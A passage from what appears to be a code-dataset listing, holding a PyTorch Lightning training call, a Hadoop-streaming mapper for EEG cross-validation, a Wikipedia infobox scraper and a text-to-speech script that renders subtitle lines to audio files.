filename='NL-full-Adam-1e_5-{epoch:02d}-{val_loss:.4f}')
trainer = pl.Trainer(gpus=1, deterministic=True,
logger=wandb_logger, callbacks=[checkpoint_callback], max_epochs=20, num_sanity_val_steps=10)
if torch.cuda.is_available():
classifier = classifier.cuda()
trainer.fit(classifier, dm) |
6,397 | e477a59e86cfeb3f26db1442a05d0052a45c42ff | #!/oasis/scratch/csd181/mdburns/python/bin/python
import sys
import pickle
import base64
from process import process
import multiprocessing as mp
EPOCH_LENGTH=.875
EPOCH_OFFSET=.125
NUM_FOLDS=5
if __name__ == "__main__":
mp.freeze_support()
p= mp.Pool(2)
for instr in sys.stdin:
this_key=''
sys.stderr.write('mapper: begin receiving data\n')
instr = instr.strip()
keystr, valstr = instr.split('\t', 1)
sys.stderr.write('mapper: key_string ' + keystr + '\n')
this_key, this_id = keystr.split('.', 1)
sys.stderr.write('mapper: key is ' + keystr +'\n')
sys.stderr.write('mapper: this_key is ' + this_key +'\n')
sys.stderr.write('mapper: this_id is ' + this_id +'\n')
v = pickle.loads(base64.decodestring(valstr))
y = v[0].reshape((-1,1))
eeg = pickle.loads(v[1])
try:
rov = process(y, eeg, EPOCH_LENGTH, EPOCH_OFFSET, NUM_FOLDS, p)
result = {'id':this_id, 'rov':rov }
except:
sys.stderr.write('mapper: process failed\n')
continue
this_val = base64.b64encode(pickle.dumps(result, protocol=2))
if this_key != '':
print '%s\t%s' % (this_key, this_val)
p.close()
sys.stderr.write('mapper: good job\n') |
6,398 | f45ca4e75de7df542fbc65253bb9cc44a868522a | import requests
from bs4 import BeautifulSoup
import codecs
url = "https://en.wikipedia.org/wiki/Pennsylvania_State_University"
response = requests.get(url)
soup = BeautifulSoup(response.content, 'html.parser')
infoBox = soup.find("table", class_="infobox vcard")
webScrape = {"Univeristy": "The Pennsylvania State University"}
wantedInfo = ["Motto", "Type", "Established", "Academic affiliations",
"Endowment", "Budget", "President", "Provost",
"Academic staff", "Students", "Undergraduates",
"Postgraduates", "Location", "Campus", "Newspaper",
"Colors", "Nickname", "Sporting affiliations", "Mascot", "Website"]
#Get all of the data inside info box
for tr in infoBox.find_all("tr"):
if len(tr.findChildren("th", recursive=False)) > 0 and \
len(tr.findChildren("td", recursive=False)) > 0:
#Grab table header and table data
header = tr.findChildren("th", recursive=False)[0]
data = tr.findChildren("td", recursive=False)[0]
#Add to dictionary if not in it already
if header.get_text() not in webScrape and header.get_text() in wantedInfo:
#Decompose unwanted tags
while data("sup"):
data.find("sup").decompose()
while data("span") and header.get_text() != "Website":
data.find("span").decompose()
webScrape[header.get_text()] = data.get_text()
#Writing to file
with codecs.open("webScrape.txt", "w", encoding="utf-8") as output_data:
for key in webScrape.keys():
output_data.write("{}: {}\n".format(key, webScrape[key])) |
6,399 | 32f4f7ad61b99848c907e092c5ed7a839f0b352b | import pyttsx3
from pydub import AudioSegment
engine = pyttsx3.init() # object creation
""" RATE"""
#printing current voice rate
engine.setProperty('rate', 150) # setting up new voice rate
rate = engine.getProperty('rate') # getting details of current speaking rate
print (rate)
"""VOLUME"""
# volume = engine.getProperty('volume') #getting to know current volume level (min=0 and max=1)
# print (volume) #printing current volume level
# engine.setProperty('volume',1.0) # setting up volume level between 0 and 1
# """VOICE"""
# voices = engine.getProperty('voices') #getting details of current voice
# #engine.setProperty('voice', voices[0].id) #changing index, changes voices. o for male
# engine.setProperty('voice', voices[1].id) #changing index, changes voices. 1 for female
# engine.say("Hello World!")
# engine.say('My current speaking rate is ' + str(rate))
# engine.runAndWait()
# engine.stop()
"""Saving Voice to a file"""
# On linux make sure that 'espeak' and 'ffmpeg' are installed
a=open('TrumpNewFF.srt').readlines()
i=2
l = len(a)
while i<l:
engine.save_to_file(a[i], 'TTS/trump/{}.mp3'.format(str(i)))
engine.runAndWait()
if i+3<l:
time_1 = a[i-1].split(' --> ')[1].split(':')
time_1_mil = time_1[-1].split(',')
time_1_mil = int(time_1_mil[0])*1000+int(time_1_mil[1])%1000
time_1_hour = float(time_1[-2])*60000
time_2 = a[i+3].split(' --> ')[0].split(':')
time_2_hour = float(time_2[-2])*60000
time_2_mil = time_2[-1].split(',')
time_2_mil = int(time_2_mil[0])*1000+int(time_2_mil[1])%1000
duration = float(time_2_hour+time_2_mil)-float(time_1_hour+time_1_mil)
# create 1 sec of silence audio segment
one_sec_segment = AudioSegment.silent(duration=int(duration)) #duration in milliseconds
print(i, duration, time_2_hour+time_2_mil, time_1_hour+time_1_mil)
#Either save modified audio
one_sec_segment.export('TTS/trump/{}.mp3'.format(str(i+1)), format="wav")
i+=4
engine.stop() |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.